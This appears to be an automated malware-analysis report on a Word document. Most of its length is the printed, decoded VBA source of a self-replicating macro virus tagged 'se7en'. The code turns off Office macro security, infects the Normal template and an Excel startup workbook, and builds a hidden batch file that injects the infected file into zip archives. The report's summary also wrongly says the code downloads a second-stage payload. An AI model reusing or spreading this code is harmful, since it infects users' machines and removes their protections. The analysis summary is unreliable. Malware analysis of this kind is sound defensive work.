Verdict: MALICIOUS
Risk Score: 320
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1137.001 Office Application Native API
- T1082 System Information Discovery
The sample contains VBA macros that execute when the document is opened or closed, as indicated by its 'Document_Open' and 'Document_Close' event handlers. The script manipulates Office security settings and uses 'CreateObject("Excel.Application")' to potentially download and execute a second-stage payload, as suggested by the 'Win.Worm.Generic-11' and 'Doc.Trojan.DarkStar-1' detections. The macro also attempts to modify registry keys that control Office macro security levels.
Heuristics (6)
- ClamAV: Win.Worm.Generic-11 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Worm.Generic-11
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4999 bytes |

SHA-256: 8ee76148535c0a6e2823759bce467bddee9902d510364ba41b7a2618d9b6f0c8
Detection (ClamAV): Doc.Trojan.DarkStar-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
'se7en
On Error Resume Next
Options.SaveNormalPrompt = (5 - 5)
Options.ConfirmConversions = (4 - 4)
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = (59 - 59)
End If
Set mal = NormalTemplate.VBProject
Set nrmal = mal.VBComponents(1).codemodule
Set ak = ActiveDocument.VBProject
Set tiv = ak.VBComponents(1).codemodule
Options.SendMailAttach = (3 - 2)
If nrmal.Lines(2, 1) <> "'se7en" Then
nrmal.DeleteLines 1, nrmal.CountOfLines
nrmal.InsertLines 2, tiv.Lines(2, tiv.CountOfLines)
nrmal.InsertLines 1, "Sub Document_Open()"
nrmal.Replaceline 65, "Sub Workbook_Deactivate"
End If
If tiv.Lines(2, 1) <> "'se7en" Then
tiv.DeleteLines 1, tiv.CountOfLines
tiv.InsertLines 2, nrmal.Lines(2, nrmal.CountOfLines)
tiv.InsertLines 1, "Sub Document_Close()"
tiv.Replaceline 65, "Sub Workbook_Activate()"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.InsertLines 1, nrmal.Lines(1, nrmal.CountOfLines)
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.Replaceline 65, "Sub Workbook_Deactivate()"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
Open "C:\Windows\Default.html" For Output As 1
Print #1, "<html><head><title>se7en</title></head><body><center><h1>Se7eN</h1> "
Print #1, "All love<br>Slowly fades<br>While we refuse change<br>All things<br>Come and go"
Print #1, "<br>This we know<br>This we know<br>You can find a reason<br>For anything<br>And you can make excuses<br>"
Print #1, "For all bad things<br>And you can justify<br>Before present occurs<br>So you can walk away<br>Before I begin to hurt<br>"
Print #1, "Can't you see that i still believe<br>That as long as you dream<br>Some things will always be<br>So please don't poison me<br>"
Print #1, "Please don't poison me<br>With your bitterness<br>You look<br>But you see right through me<br>Like I don't exist<br>"
Print #1, "I don't exist<br>But I point<br>"
Print #1, "And say you are a liar<br>"
Print #1, "You are a liar"
Print #1, "<br>Someday<br>"
Print #1, "<br><br><br>Someday</html>"
Close 1
Open "c:\Windows\Zipem.bat" For Output As 1
Print #1, "Set wz=""c:\Program Files\WinZip\WinZip32.exe"""
Print #1, "for %%a in ('*.zip ..\*.zip Windows\Desktop\*.zip ') do %wz% -a -r -p %%a c:\readme.rtf"
Close #1
ActiveDocument.SaveAs FileName:="c:\readme.rtf", FileFormat:=wdFormatDocument
Shell "c:\windows\zipem.bat", vbHide
End If
End Sub
Sub Workbook_Activate()
On Error Resume Next
Set a = ActiveWorkbook.VBProject
Set aw = a.VBComponents("ThisWorkbook").codemodule
Set t = ThisWorkbook.VBProject
Set tw = t.VBComponents("ThisWorkbook").codemodule
tw.Replaceline 65, "Sub Workbook_Deactivate"
If aw.Lines(2, 1) <> "'se7en" Then
aw.DeleteLines 1, aw.CountOfLines
aw.InsertLines 1, tw.Lines(1, tw.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\se7en.reg" For Output As 1
Print #1, "REGED
... (truncated)